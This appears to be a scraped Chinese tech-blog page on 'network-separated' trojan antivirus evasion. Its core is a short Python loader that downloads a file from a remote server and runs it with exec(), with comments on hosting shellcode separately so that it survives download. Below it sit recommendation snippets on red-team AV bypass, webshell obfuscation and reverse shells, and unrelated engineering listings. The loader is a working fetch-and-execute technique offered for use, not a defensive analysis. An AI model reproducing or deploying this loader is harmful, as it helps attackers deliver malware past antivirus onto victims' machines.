木马免杀之网络分离免杀

最新推荐文章于 2025-03-27 18:09:40 发布
最新推荐文章于 2025-03-27 18:09:40 发布
阅读量132 收藏
点赞数 1
分类专栏: 系统入侵与提权 木马免杀 渗透测试 文章标签: 木马免杀 系统入侵与提权 渗透测试 反弹shell
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YhMjQx/article/details/146133915
版权

文章目录

网络分离免杀

import ctypes,requests
resp = requests.get("http://192.168.230.147/security/NetSeparateTrojanImmunity.txt")
exec(resp.text)

# 当然我们可以将shellcode和loader分开获取,甚至需要注意
# 从服务器下载二进制数据(content)时,下载下来会将二进制数据中原有的 / 转义成 //
# 导致这样下载下来的shellcode失效,即便是使用 text 文本类型,如果网页上存放的单单只是 shellcode 那么text是文本类型,还需要将其转变为二进制
# 而转变的过程中还会遇到 / 转义的问题,所以还不如直接整个代码放上去,访问下来直接执行
# 或者就是,先将shellcode以二进制的方式写在文件中,然后在上传到服务器上,然后在写代码从服务器上使用content类型访问到二进制的shellcode即可保持完整类型
红队攻防渗透技术实战流程:红队目标上线之对抗-Webshell篇&静态查&行为拦截&流量监控&代码混淆&内存加载&工具魔改
HACKONE的博客
05-27 506
上面的实验代表了webshell的几个特征:表面代码只能解决代码表面的查操作行为哥斯拉执行命令无示antsword执行命分有示哥斯拉执行命令无示但是执行net user 有示antsword执行命分有示工具指纹源码魔改(指纹打乱,调用逻辑(行为绕过))对抗:流量产品 和 毒产品换冷内工具(自己写的工具)让产品没来得及集成这个工具的检测导致绕过(特征库)
红队内网攻防渗透:内网渗透之内网对抗:实战项目&VPC2打靶&父子域三层路由&某绒&下载突破&约束委派&域控
HACKONE的博客
02-23 178
但是再上传之前还要考虑shell的正反向问题,有没有防火墙就是关键,我们ping一下2.11,发现ping不通,不用想肯定是开了,那只能反向shell建立连接。将生成的2.jsp文件放进2文件夹,然后右键生成压缩包2.zip,再修改压缩包后缀为war,这样2.war木马包就制作出来了。打开后发现存在SQLserver数据库密码,这样就可以尝试连接2.11的数据库,因为可能密码都是一样的。我们打开目标的火绒发现火绒拦截了我们的shell,因为它开启了防止横向的功能。
Python木马分离(下载分离型)
lunito的博客
04-27 1153
msf生成python的shellcode木马简单分离思路
【护网必备】木马之远程分离加载器
Fly_鹏程万里
06-19 670
Step 3:copy自己的地址,例如:http://example.org,随后将http://example.org替换ShellCodeLoader/Source.c 的152行,生成64位发行版即可。此项目是一个简单的远程分离的加载器,国内大部分软(360、火绒、Windows Defender、金山毒霸、电脑管家)Step 1:修改Encryption/payload_c_x64.py的24行,改为自己的shellcode。点击下方名片进入公众号。
木马(篇一)基础知识学习
Goodric的博客
08-09 2619
木马技术是网络安全领域中一场持续的斗争。软不断更新自己的检测技术,而恶意软件开发者也在不断创新技术,双方相互较劲。有效的木马技术可以帮助保护系统受威胁,而了解技术也能帮助安全专家。同时技术不仅限于前面说到的几种,比如现在还会有人工智能机器学习等更高级的技术去检测威胁。这里只是通过这几种典型的技术例子更好得理解木马的查
内网渗透-网络分离
zj2084的博客
03-27 263
但是360扫出来了,是因为我们那个python代码中有注释代码,说不定注释代码的里面就有一些木马的特征,然后被360发现,所以才扫出来了,我们将注释过的代码全部删除,发现360无法扫描出来。在本地用火绒扫描一下,发现成功达到的效果,因为我们的python代码只有5行,没有任何的木马特征,所以应该是无法扫出来的。我们先在根目录下创建一个名为payload.txt的文件,将我们的paylaod放入进去,记住是双引号里面的数据,不加双引号。网络分离,既然已经分离了,所以加不加密原则上是无所谓的。
关于木马的一些方法
oiadkt的博客
04-27 1503
关于木马的一些方法
【新版】掩日windows Defender
crowsec
06-05 7049
掩日是一个非常优秀的项目,目前在`4月19`号已经更新,更新的变动较大,支持的种类更多,在这里再试试现在的效果如何:
学习-基础学习
Web安全工具库
12-15 1778
女孩可以在社会上遇到比在学校更优秀的男生,而男生在社会上或许再也遇不到比学校里更优秀的女生了。。。 ---- 网易云热评 一、名词解释 单从汉语“”的字面意思来理解,可以将其看为一种能使病毒木马毒软件查的技术。但是不得不客观地说,技术的涉猎面非常广,您可以由此轻松转型为反汇编、逆向工程甚至系统漏洞的发掘等其他顶级黑客技术,由此可见并不简单。,也就是反病毒(AntiVirus)反间谍(AntiSpyware)的对立面,英文为Anti-AntiVirus(简写Virus..
CS分离实践
痴人说梦梦中人
08-02 2383
CS分离实战一、原理简述二、环境配置三、本地测试1.生成shellcode2.代码变形3.pyinstaller打包4.测试 本次实践参考小刚师傅的教程,详细原理请看原文:https://mp.weixin.qq.com/ 一、原理简述           通过python requests远程下载经过base64编码后的shellcode和loader,然后解码通过exec函数先执行loader,
艰难的mimikatz源码编译 Windows Defender
crowsec
01-25 2871
本文mimikatz源码编译未能Windows Defender,后面使用的是其他的方式,思路和源代码暂不公开,希望师傅们能够理解!
Gh0st源码实战瑞星主动加360
10-23
因此,持续学习和研究最新的反病毒技术,才能确保Gh0st木马效果。 在“课件13.doc”中,可能详细介绍了具体的操作步骤和技巧,包括源码的修改、技术的应用实例,以及如何测试效果。通过实践这些内容...
ADSL宽带密码找回神器-版使用指南
版一词通常指的是毒软件无法检测到的软件版本。这是因为一些软件可能被设计成不触发毒软件的安全检测,可能通过某种手段绕过了毒软件的检测机制。用户在下载和使用此类软件时需要特别小心,因为它们可能...
网络安全专业名词解释
aixmmmlll的博客
05-16 4245
1.Burp Suite 是一款信息安全从业人员必备的集成型的渗透测试工具,它采用自动测试和半自动测试的方式,通过拦截HTTP/HTTPS的Web数据包,充当浏览器和相关应用程序的中间人,进行拦截、修改、重放数据包进行测试,是Web安全人员的一把必备的瑞士军刀。 2.Bypass就是绕过的意思,渗透测试人员通过特殊语句的构建或者做混淆等进行渗透测试,然后达到绕过WAF的手法。 3.C2全称为Command and Control,命令控制,常见于APT攻击场景中。作动词解释时理解为恶意软件攻击者进行交互
基于Matlab/Simulink的风电调频风储联合频域模型仿真及应用
04-06
内容概要:本文介绍了利用Matlab/Simulink进行风电调频风储联合仿真的方法。针对传统时域仿真耗时的问题,出了一种基于频域模型的方法,实现了快速高效的仿真。文中详细描述了虚拟惯性控制和储能下垂控制的具体实现方式及其对系统频率稳定性的影响。通过频域模型,将复杂的微分方程转化为简单的矩阵运算,显著高了仿真速度。同时,加入了SOC(荷电状态)管理和滑动平均滤波,确保了储能系统的安全可靠运行。实验结果显示,在相同的硬件条件下,频域模型的仿真速度比传统时域模型快了近十倍,且频率偏差明显减小。 适合人群:从事电力系统仿真、风电调频研究的专业人士和技术爱好者。 使用场景及目标:适用于需要快速验证风电调频控制策略的研究人员和工程师。主要目标是在保证仿真精度的同时大幅高仿真速度,为风电并网供技术支持。 其他说明:本文供的模型专注于调频性能分析,不涉及风机内部动态细节。对于更详细的风机模型,作者供了进一步的参考资料。
含碳交易绿证的智能楼宇微网优化调度模型及其MATLAB实现
04-06
内容概要:本文介绍了一种针对电热综合能源系统的优化调度模型,该模型在传统微网(风、光、储、火)的基础上加入了电动汽车(EVs)和智能楼宇单元,并引入了碳排放和绿色证书交易机制。模型通过MATLAB和YALMIP工具进行求解,主要关注于优化能源分配方案,降低整体成本并控制碳排放。文中详细讨论了模型的目标函数设计、约束条件设定、电动汽车充放电策略、智能楼宇温控负荷预测、绿证交易价格机制等方面的内容。实验结果显示,在考虑碳交易和绿证交易的情况下,系统的灵活性和经济性均有所高。 适合人群:从事电力系统优化、智能楼宇设计、电动汽车调度等领域研究的专业人士和技术爱好者。 使用场景及目标:适用于希望深入了解电热综合能源系统优化调度方法的研究人员,尤其是那些对碳市场和绿证交易感兴趣的从业者。目标是供一种能够有效整合多种能源形式并兼顾环境效益的解决方案。 其他说明:文中供的代码片段展示了具体的实现细节,对于想要进一步探索相关领域的读者具有很高的参考价值。此外,作者还分享了一些调参经验和遇到的问题解决办法,有助于初学者更好地理解和应用这一复杂的优化模型。
texlive-cweb-7:20180414-12.el8.x64-86.rpm.tar.gz
最新发布
04-06
1、文件说明: Centos8操作系统texlive-cweb-7:20180414-12.el8.rpm以及相关依赖,全打包为一个tar.gz压缩包 2、安装指令: #Step1、解压 tar -zxvf texlive-cweb-7:20180414-12.el8.tar.gz #Step2、进入解压后的目录,执行安装 sudo rpm -ivh *.rpm
Matlab中地表水源热泵系统建模粒子群算法优化制冷制热量
04-06
内容概要:本文详细介绍了如何使用Matlab对地表水源热泵系统进行建模,并采用粒子群算法来优化每小时的制冷量和制热量。首先,文章解释了地表水源热泵的工作原理及其重要性,随后展示了如何设定基本参数并构建热泵机组的基础模型。接着,文章深入探讨了粒子群算法的具体实现步骤,包括参数设置、粒子初始化、适应度评估以及粒子位置和速度的更新规则。为了确保优化的有效性和实用性,文中还讨论了如何处理实际应用中的约束条件,如设备的最大能力和制冷/制热模式之间的互斥关系。此外,作者分享了一些实用技巧,例如引入混合优化方法以加快收敛速度,以及在目标函数中加入额外的惩罚项来减少不必要的模式切换。最终,通过对优化结果的可视化分析,验证了所出的方法能够显著降低能耗并系统的运行效率。 适用人群:从事暖通空调系统设计、优化及相关领域的工程师和技术人员,尤其是那些希望深入了解地表水源热泵系统特性和优化方法的专业人士。 使用场景及目标:适用于需要对地表水源热泵系统进行精确建模和优化的情景,旨在找到既满足建筑负荷需求又能使机组运行在最高效率点的制冷/制热量组合。主要目标是在保证室内舒适度的前下,最大限度地节约能源并延长设备使用寿命。 其他说明:文中供的Matlab代码片段可以帮助读者更好地理解和复现整个建模和优化过程。同时,作者强调了在实际工程项目中灵活调整相关参数的重要性,以便获得更好的优化效果。
流体力学中EMD经验模态分解的MATLAB实现应用技巧
04-06
内容概要:本文详细介绍了经验模态分解(EMD)在流体力学领域的应用,特别是通过MATLAB进行流场数据分析的方法。首先,文章解释了EMD的基本概念及其在处理非平稳信号方面的优势,如湍流和涡旋数据。接着,供了具体的MATLAB代码示例,展示了如何将原始流场数据分解为多个本征模态函数(IMF),并通过可视化手段展示分解结果。此外,文中还讨论了一些常见的EMD应用技巧,如边界效应处理、筛分停止准则设置以及针对特定应用场景(如二维速度场、三维加速度信号)的优化方法。最后,强调了EMD在流场信号解剖中的重要性和实用性,并分享了多个实战案例,包括圆柱绕流、翼型失速、船舶波浪载荷等。 适合人群:从事流体力学研究的专业人士,尤其是需要处理非平稳流场数据的研究人员和技术人员。 使用场景及目标:适用于需要对复杂流场数据进行精细分析的情景,如风洞实验、CFD模拟结果后处理等。主要目标是帮助用户更好地理解和解析流场中的多尺度动态行为,高数据分析的准确性和效率。 其他说明:文章不仅供了详细的理论讲解,还包括丰富的代码示例和实用技巧,有助于读者快速掌握EMD的应用方法。同时,附带的实例数据和视频教程进一步增强了学习效果。
木马技术全解析
技术是网络安全领域中的一个重要方面,尤其是在对抗恶意软件,如病毒和木马时。这篇文档主要探讨了如何让木马毒软件检测和清除,即所谓的“”技术。作者将方法分为两大类:主动和被动。...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值